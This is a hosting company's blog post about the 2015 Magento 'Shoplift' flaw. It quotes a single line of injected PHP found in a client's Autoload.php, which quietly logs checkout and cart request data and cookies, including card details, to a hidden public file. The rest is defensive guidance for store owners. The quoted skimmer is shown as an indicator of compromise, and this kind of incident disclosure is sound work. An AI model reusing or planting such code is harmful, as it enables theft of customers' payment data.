Magento security issues (1) – recent vulnerabilities

What’s the problem

If you’ve got a Magento store, then in recent weeks you cannot help but have noticed the numerous reminders about important Magento patches that should be installed to protect the security and integrity of your site.

These stem from a security flaw termed the “Shoplift Bug” discovered in January 2015, the full details of which were revealed in April 2015. Although a patch had been made available by Magento in February to fix the flaw, that patch wasn’t widely taken up – one estimate was that at the time the details of the flaw were revealed, only 50% of all sites had been patched.

We have helped one client (not hosted with us, we hasten to add) who had suffered at the hands of hackers – in their case lib/Varien/Autoload.php had been hacked to include the following :

<?php if(preg_match("/checkout|cart/", $_SERVER["REQUEST_URI"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE)). ":", FILE_APPEND); }?>

The result of the hack was that the contents of all requests to URLs which included the words “checkout” or “cart” in them were encoded and left in a file hidden deep within the media folder – that file was publicly accessible and could be picked up and decoded by the hackers at their leisure. Whilst the payment processing was handled by their payment gateway, the card details, expiry dates, CVV numbers and address details were handled on the client’s checkout, so all that information was contained within the encoded file.

The hack also added a number of “semi-official” looking user accounts, using names like System Backup and email address @magento.com, as well as leaving a backdoor in the skin/ folder for future usage.

With those details compromised, the only line of defence against card fraud then becomes the 3D Secure code, if enabled on the account, and if enabled on any website on which the fraudsters attempt to use the card. Either way, by having card details exposed in such a way, you leave yourself vulnerable to very large fines from the PCIDSS side of things.

What you should be doing about it

There are a number of things that you can do right now to check if your site is at risk :

  • Use this free website to check if your site is at risk of the Shoplift bug
  • Check the admin accounts on your site (from the admin panel go to System / Permissions / Users) – disable and delete any that you don’t recognise straight away, and disable any others. The worst that’s going to happen is you annoy someone who you’d forgotten had access to your site, but if you don’t recognise them in the list, it’s more likely that they’ve not worked on the site in a while anyway!
  • If you have FTP access to your site (and hopefully you’ve got SFTP access, if any access, to your site) then look in the skin/ folder and see if there are any files in there – folders named “adminhtml”, “frontend” and “install” are fine, it’s files you’re worried about.
  • Also if you have SFTP or FTP access to your site, look in the lib/Varien folder and download the Autoload.php file – open it up in a text editor on your computer (it’s perfectly safe to do so) and look at the first line – be sure to scroll to the right, if you can – and see if it looks like the suspicious line above.
  • Make sure, by asking your hosts, your developers, or us, that the security patches have been installed.
  • Make sure, by looking at the bottom of any page in your admin panel, that you’re up to date in Magento versions (you should be on version 1.9.1.1). If you’re on 1.8, we’ll probably forgive you, but if you’re on 1.7 or below, it’s time to starting thinking about updating to the latest version – get in touch if you’re not sure how to go about that.

What your hosts should be doing about it

All too many hosts, these days, won’t proactively do anything to help you unless you’re on a (generally expensive) support contract. We don’t think hosting should be like that – we install all important security patches for all our hosting clients for free, as soon as they come out, without being asked, so you can get on with what you do. If that approach sounds like the sort of thing you’re after, then feel free to get in touch.

Amongst other things, your hosts should be ensuring that the hosting platform they provide is as secure as possible. Your site’s files’ permissions should be set at the most secure level which still allows the site to function, and nothing less. Access to the site should be by SFTP, not FTP, and ideally should be restricted only to those users who need it, authenticated via public key encryption, not passwords. Regular scans for viruses and other malware, a solid firewall combined with a scanning service which proactively blocks any IP addresses which act suspiciously, tight security procedures, and server monitoring of all relevant indicators should be in place. Since an improperly set up shared hosting arrangement means that a vulnerability on one site is a vulnerability in all sites, if your hosts can’t provide satisfactory answers to questions about their security arrangements, it may be time to get yourself a new host.

Got any concerns?

If, after reading the above, you’ve got any concerns whatsoever, then get in touch – we’ll happily take a look for you, and give you impartial, expert advice on whether you have got security problems and what do to about them if you do.

Keep your eyes peeled for the next posts in this series, which will look at some simple steps you implement which will secure your Magento site considerably, and then look at best practices in Magento security.

Want to talk to us about your project?